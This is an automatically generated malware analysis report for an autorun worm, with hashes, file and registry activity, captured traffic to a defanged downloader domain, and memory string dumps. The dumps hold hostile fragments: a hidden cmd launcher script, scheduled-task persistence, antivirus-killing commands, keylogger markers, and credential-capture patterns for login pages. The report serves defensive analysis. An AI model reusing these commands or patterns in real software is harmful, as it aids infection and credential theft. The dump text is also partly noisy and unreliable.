Worm.Generic.558518_f0eb4588c4

by malwarelabrobot on April 9th, 2015 in Malware Descriptions.

Trojan.Win32.Autoit.eix (Kaspersky), Worm.Generic.558518 (B) (Emsisoft), Worm.Generic.558518 (AdAware), GenericAutorunWorm.YR (Lavasoft MAS)
Behaviour: Trojan, Worm, WormAutorun


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Requires JavaScript enabled!

Summary
Dynamic Analysis
Static Analysis
Network Activity
Map
Strings from Dumps
Removals

MD5: f0eb4588c41c96c19359408cba116041
SHA1: 6413a8153152c1022ec15d2c2b1e63720fde6267
SHA256: 14933d44835c85612557fd9bcb47566500c7fe8aa2e199284109e93bba946da9
SSDeep: 24576:Hlbpa38LiI xZH4Dq3HqZ2nlte472AQHEBrj23VcKlDNLjvSCUO/MdJE:Hlbo8WxZYDq3S2lte15HEJyrN9zvKd6
Size: 1152964 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: PackerUPXCompresorGratuitowwwupxsourceforgenet, UPolyXv05_v6
Company: no certificate found
Created at: 2006-08-12 10:24:39
Analyzed on: WindowsXP SP3 32-bit


Summary:

Worm. A program that is primarily replicating on networks or removable drives.

Payload

Behaviour Description
WormAutorun A worm can spread via removable drives. It writes its executable and creates "autorun.inf" scripts on all removable drives. The autorun script will execute the Worm's file once a user opens a drive's folder in Windows Explorer.


Process activity

The Worm creates the following process(es):

WTjQtq.exe:1552
%original file name%.exe:1084

The Worm injects its code into the following process(es):

Svchost.exe:244
Svchost.exe:1824

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process WTjQtq.exe:1552 makes changes in the file system.
The Worm creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\Svchost.exe (14 bytes)

The process %original file name%.exe:1084 makes changes in the file system.
The Worm creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\WTjQtq.exe (5161 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\jBbvfn (2257 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\aut3.tmp (196 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\aut1.tmp (3057 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\XitbRK.txt (16545 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\aut2.tmp (6961 bytes)

The Worm deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\aut1.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\jBbvfn (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\XitbRK.txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\aut2.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\aut3.tmp (0 bytes)

Registry activity

The process WTjQtq.exe:1552 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "0E 56 D5 DA 91 CE 0E 4F DF 69 33 6A 7D 8E 25 CA"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

The process %original file name%.exe:1084 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "56 2F DD 64 53 86 6A D5 D5 2C 20 B2 85 D4 23 D1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

Dropped PE files

MD5 File path
27c6d03bcdb8cfeb96b716f3d8be3e18 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Svchost.exe
bae1ae33faf5a78f92d36c5beff333aa c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\WTjQtq.exe

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

A worm can spread via removable drives. It writes its executable and creates "autorun.inf" scripts on all removable drives. The autorun script will execute the Worm's file once a user opens a drive's folder in Windows Explorer.

VersionInfo

Company Name:
Product Name:
Product Version:
Legal Copyright:
Legal Trademarks:
Original Filename:
Internal Name:
File Version: 3, 2, 0, 0
File Description:
Comments:
Language: English (United States)

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
UPX0 4096 307200 0 0 d41d8cd98f00b204e9800998ecf8427e
UPX1 311296 176128 174080 5.49295 7d25dfe306c00b7142cb11e26ce68276
.rsrc 487424 8192 7680 3.66846 e21e3562c20106bcf217b2f2b52900fb

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

Total found: 1
70d60ca1018329e3dc72938c58a8d539

URLs

URL IP
hxxp://downloader-file603376433.payinstalldownload.ru/getinfo.php?r=1&snid=MzAzMDMwMzAzMDMwMzAzMDMwMzAzMDMwMzAzMDMwMzAzMDMwMzEzMA==&getid=8514c382bda3e8f333518c65f5585a87&rnd=312


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

Traffic

HEAD /getinfo.php?r=1&snid=MzAzMDMwMzAzMDMwMzAzMDMwMzAzMDMwMzAzMDMwMzAzMDMwMzEzMA==&getid=8514c382bda3e8f333518c65f5585a87&rnd=312 HTTP/1.1
Content-Type: text/html
Host: downloader-file603376433.payinstalldownload.ru
Accept: text/html, */*
User-Agent: Mozilla/3.0 (compatible; Indy Library)


HTTP/1.1 200 OK
Date: Wed, 08 Apr 2015 12:02:11 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.5.10
Cache-Control: max-age=86400
Expires: Thu, 09 Apr 2015 12:02:11 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8


The Worm connects to the servers at the folowing location(s):

Svchost.exe_244:

`.rsrc
/%Di>
QsD.Os\
on error resume next:Set oShell = WScript.CreateObject ("WScript.Shell"):oShell.run "cmd.exe /C CD /D " & chr(34) & replace(
WScript.ScriptFullName,
WScript.ScriptName, "" ) & chr(34) & " && INTERPRETER.exe STB",vbhide
%Program Files% (x86)\Microsoft Visual Studio\VB98\VB6.OLB
kernel32.dll
psapi.dll
MSVBVM60.dll
ntdll.dll
user32.dll
urlmon
URLDownloadToFileA
advapi32.dll
shell32.dll
ShellExecuteA
RegOpenKeyExA
RegCloseKey
FindExecutableA
VBA6.DLL
MasterKey
0|0|0|0|30|0|1|0|0|0|Twitter message.|20|0|Facebook message.|20|0|0|0|0|0|0|0|0||0|0|PAD0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0||1|0|0||PA0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|PAhXXp://VVV.host.com/path/yourfile.exe|1|2421Microsoft Error|Microsoft Error|32|2421PWTjQtq.exe|XitbRK.txt|LQMHDH.exe|jBbvfn|
.text
`.data
.rsrc
.rsr=
KERNEL32.DLL
MSVBVM60.DLL
NIS.exe
\Norton Internet Security\Engine\21.1.0.18\NIS.exe
egui.exe
\ESET\ESET NOD32 Antivirus\ecls.exe
avp.exe
\svchost.exe
bdagent.exe
\Bitdefender\Bitdefender 2015\certutil.exe
Avastui.exe
\AVAST Software\Avast\VisthAux.exe
\SysWOW64\svchost.exe
\System32\svchost.exe
cmd /c taskkill /F /pid
\net.exe
\se.exe
\file.txt
SELECT * FROM Win32_OperatingSystem
INTERPRETER.exe
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\
wscript.shell
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\
schtasks /create /sc minute /mo 1 /tn WindowsUpdate
schtasks /delete /tn WindowsUpdate
cmd /c icacls
/deny %username%:F
\test.exe
\SkypeUpdates\skype.exe
media.exe
WScript.Shell
hXXps://twitter.com
SendKeys
hXXp://VVV.facebook.com
cmd.exe
C:\Windows\system32\cmd.exe
&& ping 127.0.0.1 && exit
consent.exe
athenahttpbotnet
VVV.update.microsoft.com
POST /%s HTTP/1
compatible; MSIE 7.0; Windows NT 5.1; SV1)
MapVirtualKeyA
SOFTWARE\Microsoft\Active Setup\Installed Components\%s
RegCreateKeyExA
\system\systwin32.exe
DownloadAndExecute
javaw.exe
GetKeyboardType
InternetOpenUrlA
PR_OpenTCPSocket
GdiplusShutdown
ole32.dll
HTTP/1.1
UnitKeylogger
GetKeyboardLayoutNameA
C:\Windows\tracing
C:\ProgramData\Microsoft\Network\Connections\Pbk
*facebook.*/login.php*
*login.live.*/*post.srf*
*paypal.*/webscr?cmd=_login-submit*
application/x-www-form-urlencoded
Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.76 Safari/537.36
%WinDir%\SysWOW64\svchost.exe
Content-Length: %d
Keylogger
CryptDllConvertPublicKeyInfo
CryptDllEncodePublicKeyAndParameters
REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun
KeyHook
KeyboardHookDelegate
[BypassScreening]
HuntHTTPDownload
Webcam
Mozilla Firefox
TcpClient
KeyTLIST=b03
You need a registered nick to join that channel
flood.anope
InternetOpenUrlW
hXXp://VVV.gofuckbiz.com/
hXXp://kremlin.ru/
Opera/7.60 (Windows NT 5.2; U) [en] (IBM EVV/3.0/EAK01AG9/LE)
.fldr
cmd /c taskkill /F /PID
shell32.dll, 3
Scripting.FileSystemObject
autorun.inf
shell32.dll, 2
Icon=%SystemRoot%\system32\SHELL32.dll,7
shell32.dll, 0
\explorer.exe
Kernel32.dll
SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System

Svchost.exe_244_rwx_00400000_001B5000:

`.rsrc
/%Di>
QsD.Os\
on error resume next:Set oShell = WScript.CreateObject ("WScript.Shell"):oShell.run "cmd.exe /C CD /D " & chr(34) & replace(
WScript.ScriptFullName,
WScript.ScriptName, "" ) & chr(34) & " && INTERPRETER.exe STB",vbhide
%Program Files% (x86)\Microsoft Visual Studio\VB98\VB6.OLB
kernel32.dll
psapi.dll
MSVBVM60.dll
ntdll.dll
user32.dll
urlmon
URLDownloadToFileA
advapi32.dll
shell32.dll
ShellExecuteA
RegOpenKeyExA
RegCloseKey
FindExecutableA
VBA6.DLL
MasterKey
0|0|0|0|30|0|1|0|0|0|Twitter message.|20|0|Facebook message.|20|0|0|0|0|0|0|0|0||0|0|PAD0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0||1|0|0||PA0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|PAhXXp://VVV.host.com/path/yourfile.exe|1|2421Microsoft Error|Microsoft Error|32|2421PWTjQtq.exe|XitbRK.txt|LQMHDH.exe|jBbvfn|
.text
`.data
.rsrc
.rsr=
KERNEL32.DLL
MSVBVM60.DLL
NIS.exe
\Norton Internet Security\Engine\21.1.0.18\NIS.exe
egui.exe
\ESET\ESET NOD32 Antivirus\ecls.exe
avp.exe
\svchost.exe
bdagent.exe
\Bitdefender\Bitdefender 2015\certutil.exe
Avastui.exe
\AVAST Software\Avast\VisthAux.exe
\SysWOW64\svchost.exe
\System32\svchost.exe
cmd /c taskkill /F /pid
\net.exe
\se.exe
\file.txt
SELECT * FROM Win32_OperatingSystem
INTERPRETER.exe
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\
wscript.shell
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\
schtasks /create /sc minute /mo 1 /tn WindowsUpdate
schtasks /delete /tn WindowsUpdate
cmd /c icacls
/deny %username%:F
\test.exe
\SkypeUpdates\skype.exe
media.exe
WScript.Shell
hXXps://twitter.com
SendKeys
hXXp://VVV.facebook.com
cmd.exe
C:\Windows\system32\cmd.exe
&& ping 127.0.0.1 && exit
consent.exe
athenahttpbotnet
VVV.update.microsoft.com
POST /%s HTTP/1
compatible; MSIE 7.0; Windows NT 5.1; SV1)
MapVirtualKeyA
SOFTWARE\Microsoft\Active Setup\Installed Components\%s
RegCreateKeyExA
\system\systwin32.exe
DownloadAndExecute
javaw.exe
GetKeyboardType
InternetOpenUrlA
PR_OpenTCPSocket
GdiplusShutdown
ole32.dll
HTTP/1.1
UnitKeylogger
GetKeyboardLayoutNameA
C:\Windows\tracing
C:\ProgramData\Microsoft\Network\Connections\Pbk
*facebook.*/login.php*
*login.live.*/*post.srf*
*paypal.*/webscr?cmd=_login-submit*
application/x-www-form-urlencoded
Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.76 Safari/537.36
%WinDir%\SysWOW64\svchost.exe
Content-Length: %d
Keylogger
CryptDllConvertPublicKeyInfo
CryptDllEncodePublicKeyAndParameters
REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun
KeyHook
KeyboardHookDelegate
[BypassScreening]
HuntHTTPDownload
Webcam
Mozilla Firefox
TcpClient
KeyTLIST=b03
You need a registered nick to join that channel
flood.anope
InternetOpenUrlW
hXXp://VVV.gofuckbiz.com/
hXXp://kremlin.ru/
Opera/7.60 (Windows NT 5.2; U) [en] (IBM EVV/3.0/EAK01AG9/LE)
.fldr
cmd /c taskkill /F /PID
shell32.dll, 3
Scripting.FileSystemObject
autorun.inf
shell32.dll, 2
Icon=%SystemRoot%\system32\SHELL32.dll,7
shell32.dll, 0
\explorer.exe
Kernel32.dll
SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System

Svchost.exe_1824:

.idata
.rdata
P.reloc
P.rsrc
kernel32.dll
Windows
MSWHEEL_ROLLMSG
MSH_WHEELSUPPORT_MSG
MSH_SCROLL_LINES_MSG
$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)
oleaut32.dll
EVariantBadIndexError
ssShift
htKeyword
EInvalidOperation
u%CNu
Uh.vA
%s[%d]
%s_%d
EInvalidGraphicOperation
comctl32.dll
USER32.DLL
uxtheme.dll
%s%s%s%s%s%s%s%s%s%s
Proportional
MAPI32.DLL
shell32.dll
%s.%.8X:%.8X
OnKeyDown
OnKeyPresst|C
OnKeyUp
IE(AL("%s",4),"AL(\"%0:s\",3)","JK(\"%1:s\",\"%0:s\")")
JumpID("","%s")
TKeyEvent
TKeyPressEvent
HelpKeyword
crSQLWait
%s (%s)
imm32.dll
AutoHotkeysx
AutoHotkeys
ssHotTrack
TWindowState
poProportional
TWMKey
KeyPreviewl
WindowState
System\CurrentControlSet\Control\Keyboard Layouts\%.8x
vcltest3.dll
User32.dll
getservbyport
WSAAsyncGetServByPort
WSAJoinLeaf
WS2_32.DLL
127.0.0.1
TIdSocketListWindows
TIdStackWindowsU
IdStackWindows
%s, %d %s %d %s %s
ftpTransfer
ftpReady
ftpAborted
ClientPortMinT
ClientPortMax
Port
EIdCanNotBindPortInRange
EIdInvalidPortRangeSVW
saUsernamePassword
PasswordT
0.0.0.1
TIdTCPConnection
IdTCPConnection
EIdTCPConnectionError
TIdTCPClient
IdTCPClient
BoundPort
PortU
password
Password
IdHTTPHeaderInfo
ProxyPasswordT
ProxyPort
Mozilla/3.0 (compatible; Indy Library)
libeay32.dll
ssleay32.dll
SSL_CTX_use_PrivateKey_file
SSL_CTX_use_certificate_file
SSL_get_peer_certificate
SSL_CTX_set_default_passwd_cb
SSL_CTX_set_default_passwd_cb_userdata
SSL_CTX_check_private_key
X509_STORE_CTX_get_current_cert
des_set_key
sslvrfFailIfNoPeerCert
TPasswordEvent
Certificate
RootCertFile
CertFile
KeyFile`
OnGetPassword
EIdOSSLLoadingRootCertError,
EIdOSSLLoadingCertError
EIdOSSLLoadingKeyError
CommentURL
TIdHTTPMethod
IdHTTP
TIdHTTPOption
TIdHTTPOptions
TIdHTTPProtocolVersion
IdHTTP,,G
TIdHTTPOnRedirectEvent
TIdHTTPResponse
TIdHTTPRequest
TIdHTTPProtocol
TIdCustomHTTP
TIdHTTP
HTTPOptions(,G
EIdHTTPProtocolException
application/x-www-form-urlencoded
HTTPS
https
This request method is supported in HTTP 1.1
HTTP/1.0 200 OK
HTTP/
ole32.dll
hXXp://payinstall.biz/public/vendor/am.php
Opera
SOFTWARE\webssearchesSoftware\webssearcheshp
SOFTWARE\Wow6432Node\webssearchesSoftware\webssearcheshp
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Opera 20.0.1387.64
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Opera 22.0.1471.50
hXXp://gmtop.ru/files/v3.47.exe
hXXp://payinstall.biz/public/vendor/amigo.php
hXXp://payinstall.biz/public/vendor/home.php
url.dll,FileProtocolHandler
rundll32.exe
explorer.exe
hXXp://payinstall.biz/fileinfo.php?refer=
@mail.ru
SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstal\Amigo
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Amigo
httpObj$
httpObjWorkBegin
httpObjWork
Select %s from %s
WbemScripting.SWbemLocator
&type=%s
|*.*|
hXXp://downloader-file603376433.payinstalldownload.ru/getinfo.php?r=1
hXXp://downloader-file603376433.payinstalldownload.ru/setinst.php?r=1
?456789:;<=
!"#$%&'()* ,-./0123
user32.dll
GetKeyboardType
advapi32.dll
RegOpenKeyExA
RegCloseKey
RegQueryInfoKeyA
RegFlushKey
RegEnumKeyExA
RegDeleteKeyA
RegCreateKeyExA
GetCPInfo
version.dll
gdi32.dll
SetViewportOrgEx
UnhookWindowsHookEx
SetWindowsHookExA
MsgWaitForMultipleObjects
MapVirtualKeyA
LoadKeyboardLayoutA
GetKeyboardState
GetKeyboardLayoutList
GetKeyboardLayout
GetKeyState
GetKeyNameTextA
EnumWindows
EnumThreadWindows
ActivateKeyboardLayout
ShellExecuteA
comdlg32.dll
shfolder.dll
> >$>(>,>0>4>8>
5 5$5(5,50545
9 9$9(9,9094989<9@9\9|9
?#?'? ?/?3?
<!<%<)<-<1<5<
< <$<(<,<
7 7$7(7,707
6$78
? ?$?(?,?0?4?8?<?
0!1%1)1-141
3#434`4}4
: :$:(:,:0:4:8:
2$262 3?3`3
>$>6><>|>
9—9X9c9u9
0 0$0(0,00040:0
? ?$?(?,?0?4?
333333333333333333
33333833
3333339
3333333333333338
:*"*"$3338
3333333
33333333
33333333333
3333333333338
33338?383
333333333333
:*3:"$3338
333333333333333
KWindows
UrlMon
0IdHTTPHeaderInfo
 IdTCPServer
IdTCPStream
Font.Charset
Font.Color
Font.Height
Font.Name
Font.Style
httpObj
ProxyParams.BasicAuthentication
ProxyParams.ProxyPort
Request.ContentLength
Request.ContentRangeEnd
Request.ContentRangeStart
Request.ContentType
Request.Accept
Request.BasicAuthentication
Request.UserAgent
&Mozilla/3.0 (compatible; Indy Library)
HTTPOptions
HorzScrollBar.Visible
version="1.0.0.0"
name="Microsoft.Windows.Common-Controls"
version="6.0.0.0"
publicKeyToken="6595b64144ccf1df"
DCOM not installedNUnable to retrieve a pointer to a running object registered with OLE for %s/%s
Could not load root certificate.
Could not load certificate.#Could not load key, check password.
SSL status: "%s"
OLE error %.8x.Method '%s' not supported by automation object/Variant does not reference an automation object7Dispatch methods do not support more than 64 parameters
Command not supported.
Address type not supported.$Error accepting connection with SSL.
Socket is not connected..Cannot send or receive after socket is closed.#Too many references, cannot splice.
Request rejected or failed.5Request rejected because SOCKS server cannot connect.QRequest rejected because the client program and identd report different user-ids.
Protocol not supported.
Socket type not supported."Operation not supported on socket.
Protocol family not supported.0Address family not supported by protocol family.
Chunk StartedDThis authentication method is already registered with class name %s.
%s is not a valid service.
Socket Error # %d
Operation would block.
Operation now in progress.
Operation already in progress.
Socket operation on non-socket.
File "%s" not found1Only one TIdAntiFreeze can exist per application.
No data to read.$Can not bind in port range (%d - %d)
Invalid Port Range (%d - %d)
Max line length exceeded.*Error on call Winsock2 library function %s&Error on loading Winsock2 library (%s)
Resolving hostname %s.
Connecting to %s.
No help keyword specified.
Connection Closed Gracefully.;Could not bind socket. Address and port are already in use.4Failed attempting to retrieve time zone information.
No help found for %s#No context-sensitive help installed$No topic-based help system installed
Value must be between %d and %d Clipboard does not support Icons
Cannot open clipboard/Menu '%s' is already being used by another form
%s property out of range
Unsupported clipboard format
Error creating window class Cannot focus a disabled or invisible window!Control '%s' has no parent window
List count out of bounds (%d)
List index out of bounds (%d) Out of memory while expanding memory stream
Error reading %s%s%s: %s
Failed to get data for '%s'
Failed to set data for '%s'
Resource %s not found
%s.Seek not implemented$Operation not allowed on sorted list$%s not in a class registration group
Property %s does not exist
Thread creation error: %s
Thread Error: %s (%d)
*Can't write to a read-only resource streamECheckSynchronize called from thread $%x, which is NOT the main thread
Class %s not found
A class named %s already exists%List does not allow duplicates ($0%x)#A component named %s already exists%String list does not allow duplicates
Cannot create file "%s". %s
Cannot open file "%s". %s
Invalid stream format$''%s'' is not a valid component name
Invalid data type for '%s' List capacity out of bounds (%d)
Ancestor for '%s' not found
Cannot assign a %s to a %s
Interface not supported
%s (%s, line %d)
Abstract Error?Access violation at address %p in module '%s'. %s of address %p
System Error. Code: %d.
Invalid variant operation%Invalid variant operation (%s%.8x)
%s5Could not convert variant of type (%s) into type (%s)=Overflow while converting variant of type (%s) into type (%s)
Operation not supported
External exception %x
Invalid pointer operation
Invalid class typecast0Access violation at address %p. %s of address %p
Privileged instruction(Exception %s in module %s at %p.
Application Error1Format '%s' invalid or incompatible with argument
No argument for format '%s'"Variant method calls not supported
!'%s' is not a valid integer value
I/O error %d
Integer overflow Invalid floating point operation

Svchost.exe_1824_rwx_00400000_000B8000:

.idata
.rdata
P.reloc
P.rsrc
kernel32.dll
Windows
MSWHEEL_ROLLMSG
MSH_WHEELSUPPORT_MSG
MSH_SCROLL_LINES_MSG
$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)
oleaut32.dll
EVariantBadIndexError
ssShift
htKeyword
EInvalidOperation
u%CNu
Uh.vA
%s[%d]
%s_%d
EInvalidGraphicOperation
comctl32.dll
USER32.DLL
uxtheme.dll
%s%s%s%s%s%s%s%s%s%s
Proportional
MAPI32.DLL
shell32.dll
%s.%.8X:%.8X
OnKeyDown
OnKeyPresst|C
OnKeyUp
IE(AL("%s",4),"AL(\"%0:s\",3)","JK(\"%1:s\",\"%0:s\")")
JumpID("","%s")
TKeyEvent
TKeyPressEvent
HelpKeyword
crSQLWait
%s (%s)
imm32.dll
AutoHotkeysx
AutoHotkeys
ssHotTrack
TWindowState
poProportional
TWMKey
KeyPreviewl
WindowState
System\CurrentControlSet\Control\Keyboard Layouts\%.8x
vcltest3.dll
User32.dll
getservbyport
WSAAsyncGetServByPort
WSAJoinLeaf
WS2_32.DLL
127.0.0.1
TIdSocketListWindows
TIdStackWindowsU
IdStackWindows
%s, %d %s %d %s %s
ftpTransfer
ftpReady
ftpAborted
ClientPortMinT
ClientPortMax
Port
EIdCanNotBindPortInRange
EIdInvalidPortRangeSVW
saUsernamePassword
PasswordT
0.0.0.1
TIdTCPConnection
IdTCPConnection
EIdTCPConnectionError
TIdTCPClient
IdTCPClient
BoundPort
PortU
password
Password
IdHTTPHeaderInfo
ProxyPasswordT
ProxyPort
Mozilla/3.0 (compatible; Indy Library)
libeay32.dll
ssleay32.dll
SSL_CTX_use_PrivateKey_file
SSL_CTX_use_certificate_file
SSL_get_peer_certificate
SSL_CTX_set_default_passwd_cb
SSL_CTX_set_default_passwd_cb_userdata
SSL_CTX_check_private_key
X509_STORE_CTX_get_current_cert
des_set_key
sslvrfFailIfNoPeerCert
TPasswordEvent
Certificate
RootCertFile
CertFile
KeyFile`
OnGetPassword
EIdOSSLLoadingRootCertError,
EIdOSSLLoadingCertError
EIdOSSLLoadingKeyError
CommentURL
TIdHTTPMethod
IdHTTP
TIdHTTPOption
TIdHTTPOptions
TIdHTTPProtocolVersion
IdHTTP,,G
TIdHTTPOnRedirectEvent
TIdHTTPResponse
TIdHTTPRequest
TIdHTTPProtocol
TIdCustomHTTP
TIdHTTP
HTTPOptions(,G
EIdHTTPProtocolException
application/x-www-form-urlencoded
HTTPS
https
This request method is supported in HTTP 1.1
HTTP/1.0 200 OK
HTTP/
ole32.dll
hXXp://payinstall.biz/public/vendor/am.php
Opera
SOFTWARE\webssearchesSoftware\webssearcheshp
SOFTWARE\Wow6432Node\webssearchesSoftware\webssearcheshp
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Opera 20.0.1387.64
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Opera 22.0.1471.50
hXXp://gmtop.ru/files/v3.47.exe
hXXp://payinstall.biz/public/vendor/amigo.php
hXXp://payinstall.biz/public/vendor/home.php
url.dll,FileProtocolHandler
rundll32.exe
explorer.exe
hXXp://payinstall.biz/fileinfo.php?refer=
@mail.ru
SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstal\Amigo
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Amigo
httpObj$
httpObjWorkBegin
httpObjWork
Select %s from %s
WbemScripting.SWbemLocator
&type=%s
|*.*|
hXXp://downloader-file603376433.payinstalldownload.ru/getinfo.php?r=1
hXXp://downloader-file603376433.payinstalldownload.ru/setinst.php?r=1
?456789:;<=
!"#$%&'()* ,-./0123
user32.dll
GetKeyboardType
advapi32.dll
RegOpenKeyExA
RegCloseKey
RegQueryInfoKeyA
RegFlushKey
RegEnumKeyExA
RegDeleteKeyA
RegCreateKeyExA
GetCPInfo
version.dll
gdi32.dll
SetViewportOrgEx
UnhookWindowsHookEx
SetWindowsHookExA
MsgWaitForMultipleObjects
MapVirtualKeyA
LoadKeyboardLayoutA
GetKeyboardState
GetKeyboardLayoutList
GetKeyboardLayout
GetKeyState
GetKeyNameTextA
EnumWindows
EnumThreadWindows
ActivateKeyboardLayout
ShellExecuteA
comdlg32.dll
shfolder.dll
> >$>(>,>0>4>8>
5 5$5(5,50545
9 9$9(9,9094989<9@9\9|9
?#?'? ?/?3?
<!<%<)<-<1<5<
< <$<(<,<
7 7$7(7,707
6$78
? ?$?(?,?0?4?8?<?
0!1%1)1-141
3#434`4}4
: :$:(:,:0:4:8:
2$262 3?3`3
>$>6><>|>
9—9X9c9u9
0 0$0(0,00040:0
? ?$?(?,?0?4?
333333333333333333
33333833
3333339
3333333333333338
:*"*"$3338
3333333
33333333
33333333333
3333333333338
33338?383
333333333333
:*3:"$3338
333333333333333
KWindows
UrlMon
0IdHTTPHeaderInfo
 IdTCPServer
IdTCPStream
Font.Charset
Font.Color
Font.Height
Font.Name
Font.Style
httpObj
ProxyParams.BasicAuthentication
ProxyParams.ProxyPort
Request.ContentLength
Request.ContentRangeEnd
Request.ContentRangeStart
Request.ContentType
Request.Accept
Request.BasicAuthentication
Request.UserAgent
&Mozilla/3.0 (compatible; Indy Library)
HTTPOptions
HorzScrollBar.Visible
version="1.0.0.0"
name="Microsoft.Windows.Common-Controls"
version="6.0.0.0"
publicKeyToken="6595b64144ccf1df"
DCOM not installedNUnable to retrieve a pointer to a running object registered with OLE for %s/%s
Could not load root certificate.
Could not load certificate.#Could not load key, check password.
SSL status: "%s"
OLE error %.8x.Method '%s' not supported by automation object/Variant does not reference an automation object7Dispatch methods do not support more than 64 parameters
Command not supported.
Address type not supported.$Error accepting connection with SSL.
Socket is not connected..Cannot send or receive after socket is closed.#Too many references, cannot splice.
Request rejected or failed.5Request rejected because SOCKS server cannot connect.QRequest rejected because the client program and identd report different user-ids.
Protocol not supported.
Socket type not supported."Operation not supported on socket.
Protocol family not supported.0Address family not supported by protocol family.
Chunk StartedDThis authentication method is already registered with class name %s.
%s is not a valid service.
Socket Error # %d
Operation would block.
Operation now in progress.
Operation already in progress.
Socket operation on non-socket.
File "%s" not found1Only one TIdAntiFreeze can exist per application.
No data to read.$Can not bind in port range (%d - %d)
Invalid Port Range (%d - %d)
Max line length exceeded.*Error on call Winsock2 library function %s&Error on loading Winsock2 library (%s)
Resolving hostname %s.
Connecting to %s.
No help keyword specified.
Connection Closed Gracefully.;Could not bind socket. Address and port are already in use.4Failed attempting to retrieve time zone information.
No help found for %s#No context-sensitive help installed$No topic-based help system installed
Value must be between %d and %d Clipboard does not support Icons
Cannot open clipboard/Menu '%s' is already being used by another form
%s property out of range
Unsupported clipboard format
Error creating window class Cannot focus a disabled or invisible window!Control '%s' has no parent window
List count out of bounds (%d)
